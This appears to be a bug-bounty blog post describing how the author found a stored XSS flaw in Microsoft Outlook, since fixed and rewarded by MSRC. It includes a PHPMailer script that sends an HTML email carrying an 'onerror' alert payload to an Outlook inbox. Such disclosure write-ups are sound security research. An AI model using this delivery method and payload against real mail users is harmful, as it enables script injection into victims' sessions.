Microsoft outlook stored XSS write-up ($3000)

Staying home is really nightmare for me and I am so boring to learn new things. So, I decided to write a writeup about how I found stored XSS in Micorsoft outook and got some bounty $3000.

I stopped hunting bugs since last 3 years ago after I got some bounty from Yahoo, Tumblr ..etc. Last few months ago, my old tested payload from shopify pop-up in my Microsoft outlook email. So I started to dig around, I sent every XSS payload including polyglots to my Microsoft account but nothing seems showing an alert. After hours of struggling, I reported to MSRC with below message, lol. I though I am idiot.

And as expected, MSRC reply need more info. I know there is XSS bug in Microsoft outlook and I just didn’t found the endpoint. After thinking some hours, I started thinking about what if sending email client validate and encode my payload?. If my payload is standardized from sender side, there won’t be no vuln point in receiver side which is Microsoft outlook.

So I decided to write a simple php script in order send my message to outlook.

The script that I used to send XSS payload to outlook is below.

<?php
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;
require 'vendor/autoload.php';
$mail = new PHPMailer(true);
try {
    //Server settings
    $mail->SMTPDebug = 2;
    $mail->isSMTP();
    $mail->Host = 'smtp.gmail.com';
    $mail->SMTPAuth = true;
    $mail->Username = 'mymail@gmail.com';
    $mail->Password = 'mypassword';
    $mail->SMTPSecure = 'tls';
    $mail->Port = 587;
    //Recipients
    $mail->setFrom('mymail@gmail.com', 'kmt');
    $mail->addAddress('receiver@outlook.com', '');
    //Content
    $mail->isHTML(true);
    $mail->Subject = 'XSS POC';
    $mail -> Body = "<img src=x onerror=alert(1)>";
    $mail->send();
    echo 'Message has been sent';
} catch (Exception $e) {
    echo 'Message could not be sent. Mailer Error: ', $mail->ErrorInfo;
}
?>

After firing the script and watch my outlook mail box. Boom, XSS and seems office365 is also affected.

After fixing the bug I was awarded $3000 from MSRC.

Conclusion

In above scenario, I strongly believe my sender email client encode my payload before sending to outlook there is no more XSS in outlook. So I choose to write simple PHP script with PHP mailer.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s